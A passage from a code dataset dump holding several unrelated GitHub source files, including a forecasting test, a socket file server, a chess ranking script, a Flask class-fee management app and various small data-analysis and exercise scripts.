timestamp_unit=\"ms\", data_cols=[\"kpi\"]).align(granularity=\"1h\")\n n_test = len(ts) // 5\n train, test = ts[:-n_test], ts[-n_test:]\n\n # Construct ensemble to forecast up to 120hr in the future\n n = 120\n kwargs = dict(max_forecast_steps=n, transform=Identity(), refit=False)\n model0 = ETS(ETSConfig(error=\"add\", trend=\"add\", damped_trend=True, **kwargs))\n model1 = ETS(ETSConfig(error=\"mul\", trend=\"mul\", damped_trend=True, **kwargs))\n model2 = ETS(ETSConfig(error=\"mul\", trend=\"add\", damped_trend=False, **kwargs))\n ensemble = ForecasterEnsemble(\n config=ForecasterEnsembleConfig(combiner=MetricWeightedMean(metric=ForecastMetric.sMAPE)),\n models=[model0, model1, model2],\n )\n\n # Set up evaluator & run it on the data\n evaluator = ForecastEvaluator(\n model=ensemble,\n config=ForecastEvaluatorConfig(retrain_freq=\"7d\", horizon=\"5d\", cadence=0, train_window=None),\n )\n\n _, pred = evaluator.get_predict(train_vals=train, test_vals=test)\n self.assertIsInstance(pred, list)\n self.assertEqual(len(pred), len(test))\n\n # Compute ensemble's sMAPE\n smape = evaluator.evaluate(ground_truth=test, predict=pred, metric=ForecastMetric.sMAPE)\n self.assertAlmostEqual(smape, 77.9, delta=2.0)\n\n # Do a quick test of save/load\n ensemble.save(\"tmp/eval/forecast_ensemble\")\n ForecasterEnsemble.load(\"tmp/eval/forecast_ensemble\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s\", stream=sys.stdout, level=logging.INFO\n )\n unittest.main()\n","repo_name":"salesforce/Merlion","sub_path":"tests/evaluate/test_eval_forecast.py","file_name":"test_eval_forecast.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":3145,"dataset":"github-code","pt":"34"} +{"seq_id":"1526696843","text":"# ----------------------------------------------\n# Analyze estimated data\n# ----------------------------------------------\n\nimport cv2\nimport sys\nimport numpy as np\nimport os\n\nimport matplotlib.pyplot as plt\n\nlines=open(\"./estimated/identity_meta_with_estimated_age.csv\").readlines()\n\nfig = plt.figure()\nax1 = fig.add_axes((0.1, 0.6, 0.8, 0.3))\nax2 = fig.add_axes((0.1, 0.1, 0.8, 0.3))\nax1.tick_params(labelbottom=\"on\")\nax2.tick_params(labelleft=\"on\")\n\nmax_cnt=len(lines)\n\ngender_list=np.zeros((max_cnt))\nage_list=np.zeros((max_cnt))\n\nDISTRIBUTION_FILE='./estimated/estimated_distribution.png'\n\ncnt=0\n\nfor line in lines:\n\tobj=line.split(\", \")\n\tpath=obj[0]\n\ttrainset=obj[3]\n\tgender=obj[4].strip()\n\tage=int(obj[5].strip())\n\n\tif gender==\"f\":\n\t\tgender_list[cnt]=0\n\telse:\n\t\tgender_list[cnt]=1\n\tage_list[cnt]=age\n\n\tcnt=cnt+1\n\nax1.hist(gender_list, bins=2)\nax1.set_title('gender')\nax1.set_xlabel('gender')\nax1.set_ylabel('count')\nax1.legend(loc='upper right')\n\nax2.hist(age_list, bins=101, range=(0,100))\nax2.set_title('age')\nax2.set_xlabel('age')\nax2.set_ylabel('count')\nax2.legend(loc='upper right')\n\nfig.savefig(DISTRIBUTION_FILE)\nsys.exit(1)\n\n","repo_name":"abars/VGGFace2AgeLabel","sub_path":"analyze_estimated_age.py","file_name":"analyze_estimated_age.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"28821959931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/1/22 下午3:46\n# @File : server.py\n# @Project : PythonFullStack\n# @Software : PyCharm\n# ----------------------------------------------\n# ☆ ☆ ☆ ☆ ☆ ☆ ☆ \n# >>> Author : Alex\n# >>> QQ : 2426671397\n# >>> Mail : alex18812649207@gmail.com\n# >>> Github : https://github.com/koking0\n# ☆ ☆ ☆ ☆ ☆ ☆ ☆\nimport json\nimport os\nimport socket\nimport struct\n\nshare_dir = r'/media/alex/新加卷/PythonProject/PythonFullStack/第三模块_面向对象&网络编程基础/文件传输/server/share'\n\n\ndef get_order(connect, filename):\n # 3.把命令的结果返回给客户端\n # 3.1、首先制作固定长度的报头\n header_dict = {\n 'filename': filename,\n 'data_size': os.path.getsize('%s/%s' % (share_dir, filename))\n }\n header_json = json.dumps(header_dict)\n header_bytes = header_json.encode('utf-8')\n\n # 3.2、其次把报头长度发送给客户端\n connect.send(struct.pack('i', len(header_bytes)))\n\n # 3.3、然后发送报头数据\n connect.send(header_bytes)\n\n # 3.3、最后再发送文件的数据\n with open('%s/%s' % (share_dir, filename), 'rb') as f:\n for line in f:\n connect.send(line)\n\n\ndef run():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(('127.0.0.1', 9902))\n server.listen(5)\n\n print('Starting...')\n while True: # 链接循环\n connect, client_address = server.accept()\n print(client_address)\n\n while True: # 通信循环\n try:\n # 1.接收命令\n cmd = connect.recv(1024)\n if not cmd:\n break\n print('recv commend: ', cmd)\n\n # 2.解析命令,拿到命令参数\n cmds = cmd.decode('utf-8').split()\n order = cmds[0]\n filename = cmds[1]\n if order == 'get':\n get_order(connect, filename)\n except ConnectionResetError:\n break\n connect.close()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"koking0/PythonFullStack","sub_path":"第三模块_面向对象+网络编程基础/文件传输/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27511104187","text":"# vrinda bhatia code\n# [Done]First Part to input the para\n# [Done]putting the words in dict and displaying the dict like in the input format\n# [Done]last is we have to change the casing small->capital and capital->small\ndef paragraph(para):\n output = {}\n for word in para.split():\n a = word.upper()\n if a in output.keys():\n output[a] = output.get(a) + 1\n else:\n output[a] = 1\n\n sort = sorted(output, key=output.get, reverse=True)[:5]\n print(\"TOP FIVE Elements acc to frequency\")\n for element in sort:\n print(element)\n print(output[element])\n\n print(output)\n\n\ndef printLine(para):\n finalWords = []\n for i in para.split():\n temp = []\n for char in list(i):\n if (char.isupper()):\n temp.append(a.join(char.lower()))\n else:\n temp.append(a.join(char.upper()))\n finalWords.append(temp)\n sentence(finalWords)\n\n\ndef sentence(finalWords):\n ans = \" \"\n for i in finalWords:\n word = \" \"\n for j in i:\n word = word + j\n\n ans = ans + word + \" \"\n\n print(ans)\n\n\na = \"Test is to TEST the Cloud Students. Cloud StudentS have the tesT \"\nparagraph(a)\nprintLine(a)\n","repo_name":"vrindabhatia999/Python_Projects","sub_path":"AIS_interview_ques/Console_application.py","file_name":"Console_application.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"28886081592","text":"import io\nimport os\nimport threading\nimport time\n\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\n\n\nclass DbusPrepareForSleepHandler():\n\n def __init__(self) -> None:\n\n self._fd: io.TextIOWrapper = None\n DBusGMainLoop(set_as_default=True)\n self._bus = dbus.SystemBus()\n\n def aquireLock(self) -> None:\n\n obj = self._bus.get_object(\n \"org.freedesktop.login1\", \"/org/freedesktop/login1\")\n inhibit = obj.get_dbus_method(\n \"Inhibit\", \"org.freedesktop.login1.Manager\")\n fd = inhibit(dbus.String(\"sleep\"), dbus.String(\"who\"),\n dbus.String(\"why\"), dbus.String(\"delay\"))\n self._fd = os.fdopen(fd.take())\n\n def releaseLock(self) -> None:\n\n try:\n if self._fd:\n self._fd.close()\n\n except:\n pass\n\n def handleSleep(self):\n\n def _prepareForSleep(prepareForSleep: 'dbus.Boolean') -> None:\n\n if bool(prepareForSleep):\n # check occupation\n # if occupied\n # - don't release lock\n # else if not occupied\n # - calculate when to wake up and set rtc\n # - perform pre-actions\n # - release lock\n print(\"prepare for sleep 1\")\n time.sleep(10)\n self.releaseLock()\n print(\"prepare for sleep 2\")\n\n else:\n print(\"prepare after sleep 1\")\n self.aquireLock()\n # perform wakeup actions\n time.sleep(10)\n print(\"prepare after sleep 2\")\n\n self._bus.add_signal_receiver(\n _prepareForSleep,\n 'PrepareForSleep',\n 'org.freedesktop.login1.Manager',\n 'org.freedesktop.login1'\n )\n\n loop = GLib.MainLoop()\n t = threading.Thread(target=loop.run)\n t.start()\n\nif __name__ == \"__main__\":\n\n handler = DbusPrepareForSleepHandler()\n handler.handleSleep()\n # handler.aquireLock()\n pass","repo_name":"Heckie75/homeserver-power-saver","sub_path":"test/test.dbus.py","file_name":"test.dbus.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39974815694","text":"# a = [['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_']]\n\n# [print(i) for i in a]\nfrom random import randint\n\n# field = [[\"*\" for j in range(5)] for i in range(5)]\n\n# print(field)\n\ndef ran(size):\n return randint(0, size-1)\n\nsize = 10\na = []\n[a.append(['_'] * size) for _ in range(size)]\nplayer = 'X'\ngenerate = [ran(size), ran(size)]\na[generate[0]][generate[1]] = player\n[print(i) for i in a]\n","repo_name":"Kris465/MemoryBox","sub_path":"TheGame/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5533040274","text":"from pprint import pprint\n\n\nclass PlayerStatus:\n def __init__(self, name):\n self.name = name\n self.points = 0\n self.resistance_points = 0\n self.sonnenborn_berger = 0\n self.black = 0\n self.won_against = set()\n self.lost_against = set()\n self.tied_against = set()\n\n def __repr__(self):\n return (f'name={self.name}, '\n f'points={self.points}, '\n f'resistance={self.resistance_points}, '\n f'sonnenborn={self.sonnenborn_berger}, '\n f'black={self.black}, '\n f'won_against={self.won_against}, '\n f'lost_against={self.lost_against}, '\n f'tied_against={self.tied_against}, '\n f'opponents={self.opponents}')\n\n def __lt__(self, other):\n if self.points > other.points:\n return self.points > other.points\n elif self.points == other.points:\n return self.resistance_points > other.resistance_points\n elif self.resistance_points == other.resistance_points:\n return self.sonnenborn_berger > other.sonnenborn_berger\n elif self.sonnenborn_berger == other.sonnenborn_berger:\n return self.black > other.black\n\n @property\n def opponents(self):\n return self.lost_against.union(self.won_against).union(self.tied_against)\n\n\ndef splitting_input(input_: str):\n \"\"\"splitting the input string on every empty tab\"\"\"\n data = [e.strip() for e in input_.split('\\n\\n')]\n names = data[0].split()\n rounds = []\n data = data[1:]\n data = [e.split('\\n') for e in data]\n\n for round_ in data:\n rounds.append([match.split() for match in round_])\n return names, rounds\n\n\ndef creating_dictionary(player_list):\n \"\"\"creating a dictionary of player names from a parsed list\"\"\"\n ret = {player_name: PlayerStatus(player_name) for player_name in player_list}\n return ret\n\n\ndef parse_data(rounds):\n for round_ in rounds:\n for match in round_:\n white = match[0]\n black = match[1]\n white_points = match[2]\n black_points = match[3]\n player_dict[black].black += 1\n\n if white_points > black_points:\n player_dict[white].won_against.add(black)\n player_dict[black].lost_against.add(white)\n elif white_points < black_points:\n player_dict[black].won_against.add(white)\n player_dict[white].lost_against.add(black)\n elif white_points == black_points:\n player_dict[white].tied_against.add(black)\n player_dict[black].tied_against.add(white)\n else:\n raise ValueError(\"Should not happen :O\")\n\n\ndef points():\n for player in players:\n points = len(player_dict[player].won_against) + 0.5 * len(player_dict[player].tied_against)\n player_dict[player].points = points\n\n\ndef resistance_points():\n for player in players:\n for opponent in player_dict[player].opponents:\n player_dict[player].resistance_points += player_dict[opponent].points\n\n # player_dict[player]['resistance_points'] = sum(\n # [player_dict[opponent]['points'] for opponent in player_dict[player]['opponents']]\n # )\n\n\ndef sonnenborn_points():\n for player in players:\n for opponents in player_dict[player].won_against:\n player_dict[player].sonnenborn_berger += 1 * player_dict[opponents].points\n for opponents in player_dict[player].tied_against:\n player_dict[player].sonnenborn_berger += 0.5 * player_dict[opponents].points\n\n\nif __name__ == '__main__':\n with open('input_text.txt') as f:\n input_string = f.read()\n\n players, rounds = splitting_input(input_string)\n player_dict = creating_dictionary(players)\n\nparse_data(rounds)\npoints()\nresistance_points()\nsonnenborn_points()\npprint(sorted(player_dict.values()))","repo_name":"LCCLS/Chess_Ranking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2578540596","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Return the number of even ints in the given array. Note: the % \"mod\" operator computes the remainder, e.g. 5 % 2 is 1\n\n# # def count_evens(nums):\n# count = 0\n# for n in nums:\n# count -= n%2-1\n# return count\n# count_evens([2, 1, 2, 3, 4])\n# \n\n# # Return the sum of the numbers in the array, except ignore sections of numbers starting with a 6 and extending to the next 7 (every 6 will be followed by at least one 7). Return 0 for no numbers.\n\n# In[2]:\n\n\ndef sum67(nums):\n count =0\n blocked= False\n for n in nums:\n if n == 6:\n blocked = True\n continue\n if n == 7 and blocked:\n blocked = False\n continue\n if not blocked: \n count += n\n \n return count\nsum67([1, 2, 2, 6, 99, 99, 7])\n\n\n# # Given an array length 1 or more of ints, return the difference between the largest and smallest values in the array. Note: the built-in min(v1, v2) and max(v1, v2) functions return the smaller or larger of two values.\n\n# In[4]:\n\n\ndef big_diff(nums):\n return max(nums)-min(nums)\n\nbig_diff([7, 2, 10, 9]) \n\n\n# # Given an array of ints, return True if the array contains a 2 next to a 2 somewhere.\n# \n# \n\n# In[5]:\n\n\ndef has22(nums):\n for i,v in enumerate(nums[:-1]):\n if v == 2 and nums[i+1] == 2:\n return True\n return False\n\nhas22([1, 2, 1, 2]) \n\n\n\n\n\n","repo_name":"amod26/PythonPrac","sub_path":"List2.py","file_name":"List2.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10214194285","text":"from typing import List\n\n\nclass Vertex:\n def __init__(self, val: str):\n self.val = val\n self.distance = 999\n self.neighbors = []\n self.visited = False\n def add_neighbor(self, v):\n if v not in self.neighbors:\n self.neighbors.append(v)\n\nclass Graph:\n def __init__(self):\n self.vertices = {}\n def add_vertex(self, v: Vertex) -> bool:\n if v.val not in self.vertices:\n self.vertices[v.val] = v\n return True\n return False\n def add_egde(self, u: Vertex, v: Vertex):\n if u in self.vertices and v in self.vertices:\n self.vertices.get(u).add_neighbor(self.vertices.get(v))\n self.vertices.get(v).add_neighbor(self.vertices.get(u))\n return True\n return False\n def print_graph(self):\n for key in self.vertices:\n print(key,\" \", self.vertices[key].neighbors)\n def bfs(self, v: Vertex):\n q = list()\n q.append(v)\n v.visited = True\n while len(q)>0:\n curr = q.pop(0)\n\n print(curr.val)\n for vertex in curr.neighbors:\n if(not vertex.visited):\n q.append(vertex)\n vertex.visited = True\n\n\n\n\n\ng= Graph()\na= Vertex('A')\nb= Vertex('B')\nc= Vertex('C')\n\ng.add_vertex(a)\ng.add_vertex(b)\ng.add_vertex(c)\nfor i in range(ord('A'), ord('E')):\n g.add_vertex(Vertex(chr(i)))\nedges = ['AB', \"BC\", \"CA\", \"AD\", \"BE\"]\nfor edge in edges:\n g.add_egde(edge[:1],edge[1:])\n#g.print_graph()\ng.bfs(a)\n","repo_name":"gemmechu/competitiveProgramming","sub_path":".UdemyCourse/Graph/Bfs.py","file_name":"Bfs.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29194974291","text":"\"\"\" Feature engineering using a wrapper for Technical Analysis package\n\"\"\"\n\nfrom pathlib import Path\nparent = Path(__file__).resolve().parent\nsrcPath = str(parent.parent).replace(\"\\\\\", \"\\\\\\\\\")\nimport sys\nsys.path.insert(0, srcPath)\n\nimport pandas as pd\nfrom ta import add_all_ta_features\nfrom ta.utils import dropna\n\nfrom elk import search\n\ndef all_features(dataframe):\n \"\"\" Compute technical features using Technical Analysis package\n\n Args:\n dataframe (Dataframe.Object): raw dataframe\n\n Returns:\n Dataframe.Object: dataframe with additional features\n \"\"\" \n # Map column labels\n labels = {\n 'open': 'open',\n 'high': 'high',\n 'low': 'low',\n 'close': 'adjusted_close',\n 'volume': 'volume',\n }\n # Delete unecessary columns\n del dataframe['close']\n del dataframe['dividend_amount']\n del dataframe['split_coefficient']\n dataframe = dataframe.rename(columns={'day': 'date'})\n # Clean NaN values\n df = dropna(dataframe)\n # Add ta features filling NaN values\n return add_all_ta_features(df, open=labels['open'], high=labels['high'], low=labels['low'], close=labels['close'], volume=labels['volume'], fillna=True)","repo_name":"abremard/AI_Alternative_Trading","sub_path":"src/ohlc/technical_analysis.py","file_name":"technical_analysis.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"70944593377","text":"import pandas as pd\nimport numpy as np\nfrom scipy import stats\n\nfrom compare_subsets import make_subset, make_histograms\n\n# get subsets by sex\n# subset_pairs = [['women', 'men'], ['women_did_not_know', 'men_did_not_know'], ['women_may_have_known', 'men_may_have_known']]\nsubset_pairs = [['women_did_not_know', 'men_did_not_know']]\ndata = pd.read_csv('../araihazar-data/to_analyze/data_for_regressions.csv')\n\nfor subset_pair in subset_pairs:\n data_pair = {}\n count = {}\n well_as = {}\n well_as_variances = {}\n urine_as = {}\n urine_as_variances = {}\n for subset in subset_pair:\n # get subset of data\n data_pair[subset] = make_subset(data, subset)\n count[subset] = len(data_pair[subset].index)\n # get well As variance\n well_as[subset] = data_pair[subset].arsenic_ugl\n well_as_variances[subset] = np.var(data_pair[subset].arsenic_ugl)\n\n # get urine As variance\n urine_as[subset] = data_pair[subset].urine_as\n urine_as_variances[subset] = np.var(data_pair[subset].urine_as)\n # compare variances\n print(well_as[subset_pair[0]].head())\n print(well_as[subset_pair[1]].head())\n well_as_W, well_as_p = stats.levene(well_as[subset_pair[0]], well_as[subset_pair[1]], center='median')\n print(well_as_p)\n ur_as_W, ur_as_p = stats.levene(urine_as[subset_pair[0]], urine_as[subset_pair[1]], center='median')\n print(ur_as_p)\n # make histograms\n # print(well_as[subset_pair[0]])\n make_histograms(data_pair[subset_pair[0]], subset_pair[0], data_pair[subset_pair[1]], subset_pair[1], 0, 5000, 'arsenic_ugl')\n make_histograms(data_pair[subset_pair[0]], subset_pair[0], data_pair[subset_pair[1]], subset_pair[1], 0, 5000, 'urine_as')\n # save data to table\n index = [subset_pair[0], subset_pair[1], 'W', 'p']\n columns = ['primary well As variance', 'urinary As variance', 'n']\n out_data = pd.DataFrame(index=index, columns=columns)\n out_data.loc[subset_pair[0]] = [well_as_variances[subset_pair[0]], urine_as_variances[subset_pair[0]], count[subset_pair[0]]]\n out_data.loc[subset_pair[1]] = [well_as_variances[subset_pair[1]], urine_as_variances[subset_pair[1]], count[subset_pair[1]]]\n out_data.loc['W'] = [well_as_W, ur_as_W, np.nan]\n out_data.loc['p'] = [well_as_p, ur_as_p, np.nan]\n out_data.to_csv(f'../araihazar-data/analysis_output/variances_{subset_pair[0]}_{subset_pair[1]}.csv')\n\n","repo_name":"lhuhmann/araihazar","sub_path":"variance_by_sex.py","file_name":"variance_by_sex.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30646088965","text":"import os\nimport datetime\nimport simplejson\n\nfrom flask import request, current_app, make_response, send_from_directory\nfrom flask_login import login_required, current_user\nfrom werkzeug.utils import secure_filename\n\nfrom .. import db\nfrom . import fee,config\nfrom .models import Fee\nfrom ..public.models import User\nfrom ..public.mail import send_email\nfrom ..public.utils import record_error\nfrom .app import handle_balance\n\n\n@fee.route('', methods=['GET'])\ndef bill():\n try:\n bills = Fee.query.filter_by(stat=1).order_by(Fee.id.desc())\n if bills:\n surplus = bills[0].balance\n amount = bills.count()\n\n return simplejson.dumps({\n 'bills': [\n {\n 'item': bill.item,\n 'date': bill.date,\n 'detail': bill.detail,\n 'account': bill.account,\n 'balance': bill.balance\n\n } for bill in bills\n ],\n 'surplus': surplus,\n 'amount': amount\n })\n else:\n return ''\n except Exception as e:\n record_error(e)\n return '',404\n\n\n@login_required\n@fee.route('', methods=['POST'])\ndef account():\n fee = Fee()\n try:\n account_form = dict(request.form)\n fee.item = account_form['item']\n account_value = float(account_form['account'])\n fee.payer = current_user.name\n\n if account_form['action'] == 'disburse':\n fee.date = account_form['date']\n fee.detail = '-'+account_form['detail']\n fee.account = account_value*(-1)\n fee.stat = 0\n\n fee.balance = 0\n db.session.add(fee)\n db.session.commit()\n\n uploads_path = config['FEE_PATH'] + str(fee.id)\n os.mkdir(uploads_path)\n\n for account_file in request.files.getlist('file'):\n base_path = os.path.dirname(config['FEE_PATH'])\n uploads_path = os.path.join(base_path, str(fee.id), secure_filename(account_file.filename))\n account_file.save(uploads_path)\n\n target = User.query.filter_by(role='生活委员').first().email\n # send_email([target],\n # current_user.name+'申请报销'+account_form['item'],\n # '支付详情:'+account_form['detail']+'\\n'+'支付金额:'+account_form['account'],\n # current_app._get_current_object()\n # )\n\n return simplejson.dumps({\n 'result': '提交成功,等待审核',\n 'id':fee.id\n })\n\n else:\n if current_user.role != '生活委员':\n return '您不具有添加收入记录的权限', 403\n fee.date = datetime.datetime.now(\n datetime.timezone(\n datetime.timedelta(hours=8)\n )\n ).date()\n fee.detail = account_form['detail']\n fee.account = account_form['account']\n\n old_balance = Fee.query.filter_by(stat=1).order_by(Fee.id.desc()).first()\n if old_balance:\n old_balance = old_balance.balance\n fee.balance = old_balance + account_value\n else:\n fee.balance = 0 + account_value\n fee.stat=1\n db.session.add(fee)\n db.session.commit()\n\n return simplejson.dumps({\n 'result': '提交成功',\n 'id': fee.id\n })\n\n except Exception as e:\n record_error(e)\n return simplejson.dumps({\n 'result': 'error'\n }), 401\n\n\n@fee.route('/audit', methods=['GET'])\ndef audit_msg():\n try:\n auditings = Fee.query.filter_by(stat=0).order_by(Fee.id.desc())\n auditeds = Fee.query.filter_by(stat=1).order_by(Fee.id.desc())\n auditfails = Fee.query.filter_by(stat=2).order_by(Fee.id.desc())\n\n adtings, adteds, adtfails = map(lambda x:[ {\n 'id': bill.id,\n 'item': bill.item,\n 'date': bill.date,\n 'account': bill.account,\n 'payer': bill.payer,\n 'materials': os.listdir(config['FEE_PATH'] + str(bill.id)) if bill.account < 0 else []\n }for bill in x],\n [auditings, auditeds, auditfails])\n\n return simplejson.dumps({\n 'auditings': adtings,\n 'auditeds': adteds,\n 'auditfails': adtfails\n })\n except Exception as e:\n record_error(e)\n return '' ,404\n\n\n@fee.route('/', methods=['GET'])\ndef show(id,filename):\n try:\n materials_path = config['FEE_PATH'] + str(id)\n\n response = make_response(send_from_directory(materials_path, filename, as_attachment=True))\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n except Exception as e:\n record_error(e)\n return '' ,404\n\n\n@login_required\n@fee.route('/audit', methods=['POST'])\ndef audit():\n try:\n if current_user.role != '生活委员':\n return 'no privilege', 403\n payload=simplejson.loads(request.data)\n handle_balance(payload['id'],payload['action'])\n\n return 'ok',200\n except Exception as e:\n record_error(e)\n return 'BadRequest' ,502","repo_name":"SRE312/ClassIS","sub_path":"backend/ClassISapp/fee/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"43628112455","text":"from utils.parse import Parser\nfrom itertools import combinations\nfrom operator import itemgetter\n\n\nclass Vector:\n def __init__(self, x=0, y=0, z=0):\n self.x = x\n self.y = y\n self.z = z\n\n @property\n def tuple(self):\n return self.x, self.y, self.z\n\n @property\n def energy(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n\n def apply(self, vec):\n self.x += vec.x\n self.y += vec.y\n self.z += vec.z\n\n\nclass Moon:\n def __init__(self, pos):\n self.__pos = pos\n self.__velocity = Vector()\n\n @property\n def position(self):\n return self.__pos.tuple\n\n @property\n def total_energy(self):\n return self.__pos.energy * self.__velocity.energy\n\n def apply_gravity(self, gravity):\n self.__velocity.apply(gravity)\n\n def apply_velocity(self):\n self.__pos.apply(self.__velocity)\n\n\ndef axis_gravity(a, b):\n if a < b:\n return 1, -1\n\n elif a > b:\n return -1, 1\n\n return 0, 0\n\n\ndef do_time_step(moons):\n for moon_a, moon_b in combinations(moons, 2):\n gravity = [axis_gravity(c_a, c_b) for c_a, c_b in zip(\n moon_a.position, moon_b.position)]\n grav_a = Vector(*map(itemgetter(0), gravity))\n grav_b = Vector(*map(itemgetter(1), gravity))\n moon_a.apply_gravity(grav_a)\n moon_b.apply_gravity(grav_b)\n\n for m in moons:\n m.apply_velocity()\n\n\nparser = Parser(\"Day 12: The N-Body Problem - Part 1\")\nparser.parse()\nwith parser.input as input:\n stripped = (l.strip('<>\\n') for l in input)\n coordinates = (l.split(',') for l in stripped)\n moons = []\n for moon in coordinates:\n values = (coord.strip('xyz= ') for coord in moon)\n position = Vector(*map(int, values))\n moons.append(Moon(position))\n\nfor _ in range(1000):\n do_time_step(moons)\n\ntotal_energy = sum(m.total_energy for m in moons)\n\nprint(total_energy)\n","repo_name":"tranzystorek-io/aoc2019-python","sub_path":"days/d12p1.py","file_name":"d12p1.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4397294932","text":"\"\"\"\nHW 11.3\n(Sort students by grades)\nRewrite Listing 11.2, GradeExam.py, to display the students in increasing\norder of the number of correct answers.\n\"\"\"\n\n\ndef main():\n # Students' answers to the questions\n answers = [\n ['A', 'B', 'A', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['D', 'B', 'A', 'B', 'C', 'A', 'E', 'E', 'A', 'D'],\n ['E', 'D', 'D', 'A', 'C', 'B', 'E', 'E', 'A', 'D'],\n ['C', 'B', 'A', 'E', 'D', 'C', 'E', 'E', 'A', 'D'],\n ['A', 'B', 'D', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['B', 'B', 'E', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['B', 'B', 'A', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['E', 'B', 'E', 'C', 'C', 'D', 'E', 'E', 'A', 'D']]\n\n # Key to the questions\n keys = ['D', 'B', 'D', 'C', 'C', 'D', 'A', 'E', 'A', 'D']\n\n student_scores = []\n\n # Grade all answers\n for i in range(len(answers)):\n # Grade one student\n correctCount = 0\n for j in range(len(answers[i])):\n if answers[i][j] == keys[j]:\n correctCount += 1\n\n # Append student score/number pair list to a list\n student_scores.append([correctCount, i])\n\n # Sorts score/student pairs based on first value (score), descending order\n student_scores.sort(reverse=True)\n\n # Prints student number and score values\n for i in range(len(student_scores)):\n print(\"Student\", str(student_scores[i][1]) + \"'s correct count is\",\n student_scores[i][0])\n\n\nmain() # Call the main function\n","repo_name":"James-E-Sullivan/BU-MET-CS521","sub_path":"Module-4/HW_11.3_Sullivan_James.py","file_name":"HW_11.3_Sullivan_James.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35459741843","text":"\r\nimport speech_recognition as sr\r\nfrom googletrans import Translator\r\n\r\n\r\ndef listen():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1\r\n audio = r.listen(source, 0, 4)\r\n try:\r\n print(\"Recognizing...\")\r\n query = r.recognize_google(audio, language=\"en-in\")\r\n except:\r\n return \"\"\r\n query = str(query)\r\n return query.lower()\r\n\r\n\r\ndef TranslationHinToEng(Text):\r\n line = str(Text)\r\n translate = Translator()\r\n result = translate.translate(line)\r\n data = result.text\r\n print(f\"you :{data}.\")\r\n # print(f\"you : {data}.\")\r\n return data\r\n\r\n\r\ndef MicExecution():\r\n query = listen()\r\n data = TranslationHinToEng(query)\r\n return data\r\n\r\n\r\nMicExecution()\r\n\r\n","repo_name":"Rahul-Lohar/NLJarvis","sub_path":"NLJarvis/Listen.py","file_name":"Listen.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"26110590262","text":"import sys\nimport unittest\nfrom unittest.mock import MagicMock, patch\nfrom nose.tools import assert_true\nfrom nose.tools import assert_false\nfrom pjxxs import fields\n\n\nmocked_mod_name = \"mocked\"\nmocked = MagicMock()\ninner_mocked = MagicMock()\ninner_mocked.schema = fields.Schema(\"inner_mocked\", 1)\ninner_mocked.schema.add_field(fields.Object(\"inner_object\"))\ninner_mocked.schema.add_field(\n\tfields.Enum(\n\t\t\"inner_enum\", required=True, allowed_values=[\"ONE\", \"TWO\"]\n\t)\n)\n\nwith patch.dict(\"sys.modules\", mocked=mocked, inner_mocked=inner_mocked):\n\tmocked.schema = fields.Schema(mocked_mod_name, 1)\n\tmocked.schema.add_field(fields.Object(\"mocked_object\"))\n\tmocked.schema.add_field(\n\t\tfields.SchemaType(\"inner_mocked\", \"inner_mocked\", nullable=False)\n\t)\n\n\nclass TestValidation(unittest.TestCase):\n\tdef setUp(self):\n\t\twith patch.dict(\"sys.modules\", mocked=mocked):\n\t\t\tschema = fields.Schema(\"main/schema\", 